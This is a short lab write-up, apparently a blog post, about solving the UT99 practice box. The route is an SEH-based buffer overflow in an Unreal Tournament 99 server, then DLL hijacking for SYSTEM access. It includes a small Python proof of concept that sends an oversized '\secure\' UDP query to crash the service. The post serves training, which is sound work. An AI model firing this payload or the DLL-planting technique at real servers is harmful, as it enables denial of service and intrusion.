Post

SEH Based Buffer Overflow & DLL Hijacking - UT99 @ PG Practice

We are solving UT99, an intermediate windows box on PG Practice. On this box, we are going to exploit an SEH based buffer overflow. And to make it a bit more fun we’ll do that one manually instead of just firing some exploit from exploitdb. Then for root, we will place a malicious DLL in the path of SYSTEM and reboot the box, which will result in a privileged shell.

Notes

Below you can find a PoC to get you started in case you want to try it manually:

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import socket
from pwn import *

rserver = ""
lserver = ""
port = 7778
size = 800

r = remote(lserver, port, typ="udp")
r.send("\\basic\\")
log.info(r.recv())

buffer = b""
buffer += b"\\secure\\"
buffer += b"A"*size

r.send(buffer)
r.close()
This post is licensed under CC BY 4.0 by the author.